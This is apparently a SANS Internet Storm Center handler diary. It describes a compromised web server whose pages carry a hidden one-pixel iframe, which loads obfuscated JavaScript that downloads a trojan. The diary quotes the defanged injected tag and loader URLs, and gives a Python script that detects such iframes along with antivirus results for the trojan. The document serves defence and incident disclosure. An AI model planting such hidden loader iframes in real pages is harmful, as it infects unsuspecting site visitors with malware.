SANS Internet Storm Center (SANS ISC) handler diary
Iframe > malicious javascript > trojan

Another iframe on a compromised server, pointing to JavaScript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this (URLs and tags are deliberately broken up with spaces so they do not render or resolve):

<bo dy><i frame src='hxxp:// 81.95.149.28/logo/ index.php' width='1' height='1' style='visibility: hidden;'></i frame>

The obfuscated JavaScript served from hxxp:// 81.95.149.28/logo/ index.php, once decoded, downloaded and ran hxxp:// 81.95.149.28/logo/ file.php, a binary PE trojan.
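The injected tag above is the pattern a site owner should be scanning their own pages for: a frame that is one pixel square, hidden by inline CSS, and pointing off-site (here at a bare IP address). The script below is an added example for this diary, not code from the ISC or from Jeff; it walks a page's `<iframe>` tags with Python's standard HTML parser and reports the ones that combine those traits, while leaving ordinary off-site widget frames alone. The sample page, the host name `victim.example` and the address 198.51.100.7 (a documentation range) are constructed stand-ins, not the compromised server from the diary.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (not the compromised site from the diary): one
# legitimate off-site widget frame and one injected 1x1 hidden loader frame.
# 198.51.100.7 is a documentation address used as a stand-in.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://widgets.example.com/weather" width="300" height="200"></iframe>
<p>Some page content.</p>
<iframe src='http://198.51.100.7/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
</body></html>"""

# Inline CSS that makes a frame invisible to the visitor while it still loads.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
BARE_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":  # HTMLParser lower-cases tag and attribute names
            self.iframes.append({name: (value or "") for name, value in attrs})


def _dimension(value):
    """Parse a width/height attribute such as '1', '1px' or '100%'; None if absent or not numeric."""
    match = re.match(r"\s*(\d+)", value or "")
    return int(match.group(1)) if match else None


def suspicious_iframes(html, page_host):
    """Return [(src, [reasons])] for frames that look like injected loaders.

    A frame is reported when it is tiny (at most 1x1), hidden by inline CSS,
    or points at a bare IP address.  Being off-site on its own does not
    trigger a report (embedded widgets are normal) but is recorded as context
    on frames that were reported for another reason.
    """
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        width, height = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
        reasons = []
        if width is not None and height is not None and width <= 1 and height <= 1:
            reasons.append("tiny frame (%dx%d)" % (width, height))
        if HIDDEN_STYLE.search(attrs.get("style", "")):
            reasons.append("hidden by inline style")
        if BARE_IPV4.fullmatch(host):
            reasons.append("src host is a bare IP address")
        if reasons:
            if host and host != page_host.lower():
                reasons.append("src is off-site (%s)" % host)
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in suspicious_iframes(SAMPLE_HTML, "victim.example"):
        print("SUSPICIOUS iframe -> %s: %s" % (src, "; ".join(reasons)))
```

Run it over the files in a site's document root (or over fetched pages, so that server-side includes are expanded) after any notification like the one in this diary; a hit on a page you did not write that way is the injected loader, and the `src` it reports is the host to block at the proxy while the page is cleaned.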

Here is what VirusTotal had to say about file.php:


Engine             Version         Updated     Result
AntiVir            7.4.0.32        06.05.2007  TR/Small.MI.25
AVG                7.5.0.467       06.05.2007  Generic4.SJO
BitDefender        7.2             06.05.2007  Trojan.Agent.AXB
DrWeb              4.33            06.05.2007  Trojan.DownLoader.23162
eSafe              7.0.15.0        06.05.2007  Win32.Small.mi
eTrust-Vet         30.7.3693       06.05.2007  Win32/Chepvil!generic
Ewido              4.0             06.05.2007  Trojan.Small.mi
F-Secure           6.70.13030.0    06.05.2007  Trojan.Win32.Small.mi
Ikarus             T3.1.1.8        06.05.2007  Trojan.Win32.Small.mi
Kaspersky          4.0.2.24        06.05.2007  Trojan.Win32.Small.mi
Microsoft          1.2503          06.05.2007  TrojanDownloader:Win32/Agent!EF3C
Norman             5.80.02         06.05.2007  W32/Smalltroj.BHMK
Prevx1             V2              06.05.2007  Polynomial.Code.Exploit
Sophos             4.18.0          06.01.2007  Mal/Clagger-E
TheHacker          6.1.6.129       06.04.2007  Trojan/Small.mi
VirusBuster        4.3.23:9        06.05.2007  no virus found
Webwasher-Gateway  6.0.1           06.05.2007  Trojan.Small.MI.25

Additional information
File size: 6767 bytes
MD5: 3cefdebc529c408c8ba9ef20a0b6291c
SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113

The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can.

Cheers,
Adrien
Adrien de Beaupre

ISC Handler